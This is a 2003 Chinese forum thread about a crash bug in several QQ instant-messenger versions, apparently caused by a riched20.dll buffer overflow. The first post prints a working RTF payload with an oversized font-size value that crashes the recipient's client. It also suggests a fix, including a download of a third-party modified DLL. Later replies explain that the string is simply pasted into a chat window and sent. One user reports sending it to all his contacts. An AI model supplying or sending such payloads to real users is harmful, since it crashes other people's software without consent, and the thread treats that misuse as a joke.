PXE2 发表于 2003-12-24 16:36:00

QQ BUG

还记得上次QQ2000c08xx以前版本受到的那个因为riched20.dll造成的缓冲区溢出漏洞
吗?

tencent真是不长记性

这次受影响的版本为QQ2000c,QQ2003,QQ2003II

使用如下代码就可以crash掉对方,还有自己(如果你打开消息管理器看你自己发的消息
的话)


{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fnil\fc
harset134
'cb'ce'cc'e5;}} \fs1800000000000000000000000000000


补救方法,获取最新的riched20.dll(可以从office最新的组建里copy过来),也可以去木
子工作室下载修改过的riched20.dll

下载地址
http://www.muzi-studio.com/file/pafiledb.php?action=file&id=43

elovebug 发表于 2003-12-26 11:40:28

请问具体如何进行攻击?

樱家冢 发表于 2003-12-26 19:15:31

把上面的代码复制到给对方发送信息的框里面发送就可以了,这种东西知道就可以了,还是不要拿来实践得好。

elovebug 发表于 2003-12-27 13:15:09

果然管用,我把那段代码给我QQ上的人一人发了一个,然后就下线了,第二天一上线,所有的好友发来同一句话“这是什么”
一百多条信息,看了半天才看完,累呀~
页: [1]
查看完整版本: QQ BUG